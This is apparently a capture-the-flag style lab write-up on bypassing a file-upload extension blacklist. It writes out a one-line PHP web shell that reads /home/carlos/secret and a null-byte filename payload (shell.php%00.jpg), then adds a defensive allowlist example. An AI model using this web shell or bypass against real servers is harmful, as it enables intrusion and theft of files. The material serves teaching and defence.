This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
1. Log in to your account with wiener:peter.
2. Turn on the proxy and upload shell.php, which contains the code below:
   <?php echo file_get_contents('/home/carlos/secret'); ?>
3. Find the Content-Disposition header and change the value of the filename parameter to include a URL-encoded null byte, followed by the .jpg extension: filename="shell.php%00.jpg"
4. Send the request and turn off the proxy.
5. Go to My Account, refresh the page, right-click the image, and click Open Image in New Tab. Remove the %00.jpg from the URL and press Enter, for example: /files/avatars/shell.php
6. Copy the secret and paste it into the solution to solve the lab.
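Why the extension blacklist accepts the filename used above, and what a hardened check looks like, as an added example that is not the lab's own code. The blacklist contents, ALLOWED_EXT and both function names are assumptions made for illustration.

```php
<?php
// Added example: filename handling for an avatar upload.
// ALLOWED_EXT, the blacklist entries and the function names are assumptions.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Weak pattern: a blacklist applied to the last extension of the raw,
// still-encoded client filename. "shell.php%00.jpg" ends in "jpg" here.
function blacklist_accepts(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return !in_array($ext, ['php', 'php5', 'phtml'], true);
}

// Hardened: decode fully, reject NUL/control bytes and path separators,
// allowlist the extension, and never reuse the client-supplied name.
function safe_stored_name(string $clientName): ?string
{
    $name = $clientName;
    for ($i = 0; $i < 3 && ($decoded = rawurldecode($name)) !== $name; $i++) {
        $name = $decoded;                       // undo nested URL encoding
    }
    if (rawurldecode($name) !== $name) {
        return null;                            // still encoded after 3 passes
    }
    if (preg_match('/[\x00-\x1f\x7f\/\\\\]/', $name)) {
        return null;                            // NUL, control bytes, separators
    }
    if (substr_count($name, '.') !== 1) {
        return null;                            // exactly one extension allowed
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;                            // allowlist, not blacklist
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;  // server-chosen name
}

// Constructed sample filenames, including single and double encoding.
$samples = ['avatar.jpg', 'shell.php', 'shell.php%00.jpg', 'shell.php%2500.jpg'];
foreach ($samples as $n) {
    printf("%-20s blacklist=%-6s hardened=%s\n", $n,
        blacklist_accepts($n) ? 'accept' : 'reject',
        safe_stored_name($n) ?? 'reject');
}
```

Only avatar.jpg gets a stored name from the hardened function; the blacklist accepts both encoded variants. Filename checks are one layer: the upload directory should also be configured so the server never executes files stored in it.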
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng